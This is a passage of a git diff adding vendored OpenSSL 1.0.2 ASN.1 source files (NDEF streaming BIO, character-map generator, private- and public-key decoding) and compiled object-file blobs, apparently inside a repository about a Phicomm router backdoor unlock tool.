+    const ASN1_ITEM *it;
+    /* Top of the BIO chain */
+    BIO *ndef_bio;
+    /* Output BIO */
+    BIO *out;
+    /* Boundary where content is inserted */
+    unsigned char **boundary;
+    /* DER buffer start */
+    unsigned char *derbuf;
+} NDEF_SUPPORT;
+
+static int ndef_prefix(BIO *b, unsigned char **pbuf, int *plen, void *parg);
+static int ndef_prefix_free(BIO *b, unsigned char **pbuf, int *plen,
+                            void *parg);
+static int ndef_suffix(BIO *b, unsigned char **pbuf, int *plen, void *parg);
+static int ndef_suffix_free(BIO *b, unsigned char **pbuf, int *plen,
+                            void *parg);
+
+BIO *BIO_new_NDEF(BIO *out, ASN1_VALUE *val, const ASN1_ITEM *it)
+{
+    NDEF_SUPPORT *ndef_aux = NULL;
+    BIO *asn_bio = NULL;
+    const ASN1_AUX *aux = it->funcs;
+    ASN1_STREAM_ARG sarg;
+
+    if (!aux || !aux->asn1_cb) {
+        ASN1err(ASN1_F_BIO_NEW_NDEF, ASN1_R_STREAMING_NOT_SUPPORTED);
+        return NULL;
+    }
+    ndef_aux = OPENSSL_malloc(sizeof(NDEF_SUPPORT));
+    asn_bio = BIO_new(BIO_f_asn1());
+
+    /* ASN1 bio needs to be next to output BIO */
+
+    out = BIO_push(asn_bio, out);
+
+    if (!ndef_aux || !asn_bio || !out)
+        goto err;
+
+    BIO_asn1_set_prefix(asn_bio, ndef_prefix, ndef_prefix_free);
+    BIO_asn1_set_suffix(asn_bio, ndef_suffix, ndef_suffix_free);
+
+    /*
+     * Now let callback prepend any digest, cipher etc BIOs ASN1 structure
+     * needs.
+     */
+
+    sarg.out = out;
+    sarg.ndef_bio = NULL;
+    sarg.boundary = NULL;
+
+    if (aux->asn1_cb(ASN1_OP_STREAM_PRE, &val, it, &sarg) <= 0)
+        goto err;
+
+    ndef_aux->val = val;
+    ndef_aux->it = it;
+    ndef_aux->ndef_bio = sarg.ndef_bio;
+    ndef_aux->boundary = sarg.boundary;
+    ndef_aux->out = out;
+
+    BIO_ctrl(asn_bio, BIO_C_SET_EX_ARG, 0, ndef_aux);
+
+    return sarg.ndef_bio;
+
+ err:
+    if (asn_bio)
+        BIO_free(asn_bio);
+    if (ndef_aux)
+        OPENSSL_free(ndef_aux);
+    return NULL;
+}
+
+static int ndef_prefix(BIO *b, unsigned char **pbuf, int *plen, void *parg)
+{
+    NDEF_SUPPORT *ndef_aux;
+    unsigned char *p;
+    int derlen;
+
+    if (!parg)
+        return 0;
+
+    ndef_aux = *(NDEF_SUPPORT **)parg;
+
+    derlen = ASN1_item_ndef_i2d(ndef_aux->val, NULL, ndef_aux->it);
+    p = OPENSSL_malloc(derlen);
+    ndef_aux->derbuf = p;
+    *pbuf = p;
+    derlen = ASN1_item_ndef_i2d(ndef_aux->val, &p, ndef_aux->it);
+
+    if (!*ndef_aux->boundary)
+        return 0;
+
+    *plen = *ndef_aux->boundary - *pbuf;
+
+    return 1;
+}
+
+static int ndef_prefix_free(BIO *b, unsigned char **pbuf, int *plen,
+                            void *parg)
+{
+    NDEF_SUPPORT *ndef_aux;
+
+    if (!parg)
+        return 0;
+
+    ndef_aux = *(NDEF_SUPPORT **)parg;
+
+    if (ndef_aux->derbuf)
+        OPENSSL_free(ndef_aux->derbuf);
+
+    ndef_aux->derbuf = NULL;
+    *pbuf = NULL;
+    *plen = 0;
+    return 1;
+}
+
+static int ndef_suffix_free(BIO *b, unsigned char **pbuf, int *plen,
+                            void *parg)
+{
+    NDEF_SUPPORT **pndef_aux = (NDEF_SUPPORT **)parg;
+    if (!ndef_prefix_free(b, pbuf, plen, parg))
+        return 0;
+    OPENSSL_free(*pndef_aux);
+    *pndef_aux = NULL;
+    return 1;
+}
+
+static int ndef_suffix(BIO *b, unsigned char **pbuf, int *plen, void *parg)
+{
+    NDEF_SUPPORT *ndef_aux;
+    unsigned char *p;
+    int derlen;
+    const ASN1_AUX *aux;
+    ASN1_STREAM_ARG sarg;
+
+    if (!parg)
+        return 0;
+
+    ndef_aux = *(NDEF_SUPPORT **)parg;
+
+    aux = ndef_aux->it->funcs;
+
+    /* Finalize structures */
+    sarg.ndef_bio = ndef_aux->ndef_bio;
+    sarg.out = ndef_aux->out;
+    sarg.boundary = ndef_aux->boundary;
+    if (aux->asn1_cb(ASN1_OP_STREAM_POST,
+                     &ndef_aux->val, ndef_aux->it, &sarg) <= 0)
+        return 0;
+
+    derlen = ASN1_item_ndef_i2d(ndef_aux->val, NULL, ndef_aux->it);
+    p = OPENSSL_malloc(derlen);
+    ndef_aux->derbuf = p;
+    *pbuf = p;
+    derlen = ASN1_item_ndef_i2d(ndef_aux->val, &p, ndef_aux->it);
+
+    if (!*ndef_aux->boundary)
+        return 0;
+    *pbuf = *ndef_aux->boundary;
+    *plen = derlen - (*ndef_aux->boundary - ndef_aux->derbuf);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_ndef.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_ndef.o
new file mode 100644
index 0000000000000000000000000000000000000000..7b8a89200c3d0edeb6dc7b041e0d0c17c9392f46
GIT binary patch
literal 4024
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
KeP~P)r~W@fJKS3U

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/charmap.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/charmap.h
new file mode 100644
index 0000000..3305ad1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/charmap.h
@@ -0,0 +1,15 @@
+/*
+ * Auto generated with chartype.pl script. Mask of various character
+ * properties
+ */
+
+static const unsigned char char_type[] = {
+    2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
+    2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
+    120, 0, 1, 40, 0, 0, 0, 16, 16, 16, 0, 25, 25, 16, 16, 16,
+    16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 9, 9, 16, 9, 16,
+    0, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16,
+    16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 0, 1, 0, 0, 0,
+    0, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16,
+    16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 0, 0, 0, 0, 2
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/charmap.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/charmap.pl
new file mode 100644
index 0000000..25ebf2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/charmap.pl
@@ -0,0 +1,83 @@
+#!/usr/local/bin/perl -w
+
+# Written by Dr Stephen N Henson (steve@openssl.org).
+# Licensed under the terms of the OpenSSL license.
+
+use strict;
+
+my ($i, @arr);
+
+# Set up an array with the type of ASCII characters
+# Each set bit represents a character property.
+
+# RFC2253 character properties
+my $RFC2253_ESC = 1;	# Character escaped with \
+my $ESC_CTRL	= 2;	# Escaped control character
+# These are used with RFC1779 quoting using "
+my $NOESC_QUOTE	= 8;	# Not escaped if quoted
+my $PSTRING_CHAR = 0x10;	# Valid PrintableString character
+my $RFC2253_FIRST_ESC = 0x20; # Escaped with \ if first character
+my $RFC2253_LAST_ESC = 0x40;  # Escaped with \ if last character
+
+for($i = 0; $i < 128; $i++) {
+	# Set the RFC2253 escape characters (control)
+	$arr[$i] = 0;
+	if(($i < 32) || ($i > 126)) {
+		$arr[$i] |= $ESC_CTRL;
+	}
+
+	# Some PrintableString characters
+	if(		   ( ( $i >= ord("a")) && ( $i <= ord("z")) )
+			|| (  ( $i >= ord("A")) && ( $i <= ord("Z")) )
+			|| (  ( $i >= ord("0")) && ( $i <= ord("9")) )  ) {
+		$arr[$i] |= $PSTRING_CHAR;
+	}
+}
+
+# Now setup the rest
+
+# Remaining RFC2253 escaped characters
+
+$arr[ord(" ")] |= $NOESC_QUOTE | $RFC2253_FIRST_ESC | $RFC2253_LAST_ESC;
+$arr[ord("#")] |= $NOESC_QUOTE | $RFC2253_FIRST_ESC;
+
+$arr[ord(",")] |= $NOESC_QUOTE | $RFC2253_ESC;
+$arr[ord("+")] |= $NOESC_QUOTE | $RFC2253_ESC;
+$arr[ord("\"")] |= $RFC2253_ESC;
+$arr[ord("\\")] |= $RFC2253_ESC;
+$arr[ord("<")] |= $NOESC_QUOTE | $RFC2253_ESC;
+$arr[ord(">")] |= $NOESC_QUOTE | $RFC2253_ESC;
+$arr[ord(";")] |= $NOESC_QUOTE | $RFC2253_ESC;
+
+# Remaining PrintableString characters
+
+$arr[ord(" ")] |= $PSTRING_CHAR;
+$arr[ord("'")] |= $PSTRING_CHAR;
+$arr[ord("(")] |= $PSTRING_CHAR;
+$arr[ord(")")] |= $PSTRING_CHAR;
+$arr[ord("+")] |= $PSTRING_CHAR;
+$arr[ord(",")] |= $PSTRING_CHAR;
+$arr[ord("-")] |= $PSTRING_CHAR;
+$arr[ord(".")] |= $PSTRING_CHAR;
+$arr[ord("/")] |= $PSTRING_CHAR;
+$arr[ord(":")] |= $PSTRING_CHAR;
+$arr[ord("=")] |= $PSTRING_CHAR;
+$arr[ord("?")] |= $PSTRING_CHAR;
+
+# Now generate the C code
+
+print <<EOF;
+/* Auto generated with chartype.pl script.
+ * Mask of various character properties
+ */
+
+static unsigned char char_type[] = {
+EOF
+
+for($i = 0; $i < 128; $i++) {
+	print("\n") if($i && (($i % 16) == 0));
+	printf("%2d", $arr[$i]);
+	print(",") if ($i != 127);
+}
+print("\n};\n\n");
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pr.c
new file mode 100644
index 0000000..c96da09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pr.c
@@ -0,0 +1,168 @@
+/* crypto/asn1/d2i_pr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include "asn1_locl.h"
+
+EVP_PKEY *d2i_PrivateKey(int type, EVP_PKEY **a, const unsigned char **pp,
+                         long length)
+{
+    EVP_PKEY *ret;
+
+    if ((a == NULL) || (*a == NULL)) {
+        if ((ret = EVP_PKEY_new()) == NULL) {
+            ASN1err(ASN1_F_D2I_PRIVATEKEY, ERR_R_EVP_LIB);
+            return (NULL);
+        }
+    } else {
+        ret = *a;
+#ifndef OPENSSL_NO_ENGINE
+        if (ret->engine) {
+            ENGINE_finish(ret->engine);
+            ret->engine = NULL;
+        }
+#endif
+    }
+
+    if (!EVP_PKEY_set_type(ret, type)) {
+        ASN1err(ASN1_F_D2I_PRIVATEKEY, ASN1_R_UNKNOWN_PUBLIC_KEY_TYPE);
+        goto err;
+    }
+
+    if (!ret->ameth->old_priv_decode ||
+        !ret->ameth->old_priv_decode(ret, pp, length)) {
+        if (ret->ameth->priv_decode) {
+            PKCS8_PRIV_KEY_INFO *p8 = NULL;
+            p8 = d2i_PKCS8_PRIV_KEY_INFO(NULL, pp, length);
+            if (!p8)
+                goto err;
+            EVP_PKEY_free(ret);
+            ret = EVP_PKCS82PKEY(p8);
+            PKCS8_PRIV_KEY_INFO_free(p8);
+
+        } else {
+            ASN1err(ASN1_F_D2I_PRIVATEKEY, ERR_R_ASN1_LIB);
+            goto err;
+        }
+    }
+    if (a != NULL)
+        (*a) = ret;
+    return (ret);
+ err:
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        EVP_PKEY_free(ret);
+    return (NULL);
+}
+
+/*
+ * This works like d2i_PrivateKey() except it automatically works out the
+ * type
+ */
+
+EVP_PKEY *d2i_AutoPrivateKey(EVP_PKEY **a, const unsigned char **pp,
+                             long length)
+{
+    STACK_OF(ASN1_TYPE) *inkey;
+    const unsigned char *p;
+    int keytype;
+    p = *pp;
+    /*
+     * Dirty trick: read in the ASN1 data into a STACK_OF(ASN1_TYPE): by
+     * analyzing it we can determine the passed structure: this assumes the
+     * input is surrounded by an ASN1 SEQUENCE.
+     */
+    inkey = d2i_ASN1_SEQUENCE_ANY(NULL, &p, length);
+    /*
+     * Since we only need to discern "traditional format" RSA and DSA keys we
+     * can just count the elements.
+     */
+    if (sk_ASN1_TYPE_num(inkey) == 6)
+        keytype = EVP_PKEY_DSA;
+    else if (sk_ASN1_TYPE_num(inkey) == 4)
+        keytype = EVP_PKEY_EC;
+    else if (sk_ASN1_TYPE_num(inkey) == 3) { /* This seems to be PKCS8, not
+                                              * traditional format */
+        PKCS8_PRIV_KEY_INFO *p8 = d2i_PKCS8_PRIV_KEY_INFO(NULL, pp, length);
+        EVP_PKEY *ret;
+
+        sk_ASN1_TYPE_pop_free(inkey, ASN1_TYPE_free);
+        if (!p8) {
+            ASN1err(ASN1_F_D2I_AUTOPRIVATEKEY,
+                    ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE);
+            return NULL;
+        }
+        ret = EVP_PKCS82PKEY(p8);
+        PKCS8_PRIV_KEY_INFO_free(p8);
+        if (a) {
+            *a = ret;
+        }
+        return ret;
+    } else
+        keytype = EVP_PKEY_RSA;
+    sk_ASN1_TYPE_pop_free(inkey, ASN1_TYPE_free);
+    return d2i_PrivateKey(keytype, a, pp, length);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pr.o
new file mode 100644
index 0000000000000000000000000000000000000000..6df7b4189d17e721be6cb21a3305294d4a31a5f1
GIT binary patch
literal 3224
zcmbuBU2Gdg5P;XQ^Fv84h89Q_sEiaUL+BBwl}IZ<J|~x)$>oRqwNV?cPI7HRer(xi
zNO%B*aio*m0#6`bh(HL$6GA+oMifhFg?OPz2p#|l9;%XJN-0%Qg`%37z1?Qx_#^})
z?d{IDGqba^cWb|>>YWuH58>h=Pmm3bQ$h~iwlNOVVVKmBT5_#^*Wb!W)c#5tj@sWU
zLyEmVJgC{%wCrD2jh2(O?B#Ux8ain9IW3z{?@~kg(3hvHfSh>?9-r62gBo1=1V$b9
zMa{lKbug}VjNgTc!ZTV<^=rA8J^}>;)logO5GLvEh4v2nPu>0<T#H|4^VWqzk4{0T
zNJB;Kv*2Pycxc`Jg>vX2EjlbTI%{D%C5aWbY1tpFotoWT*ny);ZGSUtj-?s8d|0#B
z#*`z<nDX>0t;a#E$ah$g>&j5nUJn(aCYj%YlUmOAKoIk{JDM6oc`a9^owS<#sQPIZ
zn*9Y&NY6bEmLzkds{WNF>T_k~O*k5Am$~7y79oQbtRo}d^l>Obs0cf!M7M8(MU?HY
z2M*#sXN&KH&zbY^*r<IdUr=?nA?Puo8XBZ0dqK;AV(pIFzNSK8#R5MkGF#-TZvU#=
z7ww;@uI2QmhDmL2E#0S8>A=j{;9*uF#aJa>?d=Bw!Qt`ryp;~@m-osodqR(<sTz8r
zwMA~(_n?Cb@xgL_XqC{qdWT5`A$eq8Xec|Jj(DCQAf5%kr?IxW<~68N8}NJCoF8B4
zPRW0&LX{d$dQ~ZK!q*`Mmns#hB~w-LhZO9P0uiYpBKady4V(^`A7Z{u%=gs_FgS(2
zCw;0EJW<&xwJcRBQd_3FLpoZqF10~0MG8hXMPfn9bQso0t`^Ho!QOCot9Wnidh?u@
zR%tUs%}em@*eYI9y%hrS64-nh@zUyVp4bNJokE_p#=v$$!}BVYM*x)LkGb$CUHB0f
zj<038_%FNg*IoFBz;R!EKlJ>8edc2SjSK(Yg<o>v*IhW7Y@Id|NqK?}`jgYo#w@ej
zTqH)9-WO4Hqp!1bP#rRcl!&exL>=ij`n%OpW8Qp@r~?B=B5fIFG8s>9Or=cAuoe@h
z6S2E}u+8Wnh>jTO7VYiq+ps*AG)<;~RVxN2{aYOjYKMs`X)7+|NYP+#$QV?g8diJT
zRYU0=C8-%>K0QYioERGIR~>htiFm>p8%D~CP0Sb*Q!~b~*z_#aW;Zkx{Pu5$wqA6k
z3n2*dT4<afL<oW$uXN7eK?s6eg2wsB2tkn7L*x83LJ;KmesO*dAqet2pmF{)j8Tw_
z`P`&*Yy58ZsiXaNXgtn{!10dbe2npjfZZkVl#6}Vg})(iu@3JE{B9xss=&p4ofo)R
zpC1J-)@NPdV*FaT*io<!_*aAP_kMxjBk%x>QE-}>P#y0F6wdi~Oytz!oD~~~-by<C
z6dxtc*_dpZ3l@<lV^)mF<Ea#pC*pH+<~*?ZxMj-l+p~whluSQ9pOzEJc*0Cti$tao
z%qe(#V{@jH!2f&(z#mIhdV`07q3jbk4LU0;ox?{XG^}M9nkXNzfPUtW_c;3Uo4<h>
z<M)P~|IRW@tdey(FJ1p(n829-)jtHj7_$YMD17~95yF_S&-()c6HVX#m-*xG5B^G)
znlCdD5QD;)*N@|I7+@}?{&@zLxgqOI{l|cpJHJnvA+HObA0qD0&#&CtxYSX0AYqmV
p-lh1xmHHzqJv%^T8UKiZRPjPP>aF@SmEMWv{MXn*v)s_d{~sM!K-mBQ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pu.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pu.c
new file mode 100644
index 0000000..33542dd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/d2i_pu.c
@@ -0,0 +1,136 @@
+/* crypto/asn1/d2i_pu.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/asn1.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_EC
+# include <openssl/ec.h>
+#endif
+
+EVP_PKEY *d2i_PublicKey(int type, EVP_PKEY **a, const unsigned char **pp,
+                        long length)
+{
+    EVP_PKEY *ret;
+
+    if ((a == NULL) || (*a == NULL)) {
+        if ((ret = EVP_PKEY_new()) == NULL) {
+            ASN1err(ASN1_F_D2I_PUBLICKEY, ERR_R_EVP_LIB);
+            return (NULL);
+        }
+    } else
+        ret = *a;
+
+    if (!EVP_PKEY_set_type(ret, type)) {
+        ASN1err(ASN1_F_D2I_PUBLICKEY, ERR_R_EVP_LIB);
+        goto err;
+    }
+
+    switch (EVP_PKEY_id(ret)) {
+#ifndef OPENSSL_NO_RSA
+    case EVP_PKEY_RSA:
+        /* TMP UGLY CAST */
+        if ((ret->pkey.rsa = d2i_RSAPublicKey(NULL,
+                                              (const unsigned char **)pp,
+                                              length)) == NULL) {
+            ASN1err(ASN1_F_D2I_PUBLICKEY, ERR_R_ASN1_LIB);
+            goto err;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_DSA
+    case EVP_PKEY_DSA:
+        /* TMP UGLY CAST */
+        if (!d2i_DSAPublicKey(&(ret->pkey.dsa),
+                              (const unsigned char **)pp, length)) {
+            ASN1err(ASN1_F_D2I_PUBLICKEY, ERR_R_ASN1_LIB);
+            goto err;
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_EC
+    case EVP_PKEY_EC:
